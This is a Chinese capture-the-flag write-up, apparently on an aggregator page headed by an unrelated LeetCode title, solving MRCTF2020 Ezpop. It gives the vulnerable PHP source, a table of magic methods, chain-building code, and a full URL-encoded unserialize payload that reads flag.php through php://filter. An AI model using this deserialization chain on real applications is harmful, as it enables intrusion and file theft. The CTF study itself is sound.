每天一道力扣題:不相交的線
阿新 • • 發佈:2021-05-23
[MRCTF2020]Ezpop
考點:1. pop鏈的構造 2.偽協議
- 先看看原始碼
<?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source."<br>"; } public function __toString(){ return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) { echo "hacker"; $this->source = "index.php"; } } } class Test{ public $p; public function __construct(){ $this->p = array(); } public function __get($key){ $function = $this->p; return $function(); } } if(isset($_GET['pop'])){ @unserialize($_GET['pop']); } else{ $a=new Show; highlight_file(__FILE__); }
想辦法到達Modifier類進行檔案包含
上一個pop鏈的題沒有記錄寫魔術方法,這次大概記錄一下魔術方法的作用
魔術方法 | 作用 |
---|---|
__construct() | 當物件被建立時會呼叫此方法 |
__destrurct() | 在某個物件的所有引用都被刪除或者當物件被顯式銷燬時執行 |
__sleep() | 當物件被序列化時會呼叫此方法 |
__wakeup() | 當物件被反序列化時將會呼叫此方法 |
__call() | 在物件中呼叫一個不可訪問方法時,該方法被呼叫 |
__callStatic() | 在靜態上下文中呼叫一個不可訪問方法時,該方法被呼叫 |
__get() | 讀取不可訪問屬性的值時,該方法被呼叫 |
__set() | 在給不可訪問屬性賦值時,該方法被呼叫 |
__toString() | 當一個類被當作字串時將會呼叫此方法 |
__invoke() | 當嘗試以呼叫函式的方式呼叫一個物件時該方法會被呼叫 |
__isset() | 當對不可訪問屬性呼叫 isset() 或 empty() 時,該方法會被呼叫 |
__unset() | 當對不可訪問屬性呼叫 unset() 時,該方法會被呼叫 |
就先這麼多吧!
- 構造程式碼:
<?php class Modifier { protected $var = "php://filter/read=convert.base64-encode/resource=flag.php"; } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; } } class Test{ public $p; public function __construct(){ $this->p = new Modifier; } } $b = new Show; $b->str = new Test; $b->str->p = new Modifier; $a = new Show($b); echo urlencode(serialize($a)); ?>
payload:
http://a4ef15f6-3d4e-416b-bc25-7ae776bf191f.node3.buuoj.cn/?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
然後再進行base64解碼得到flag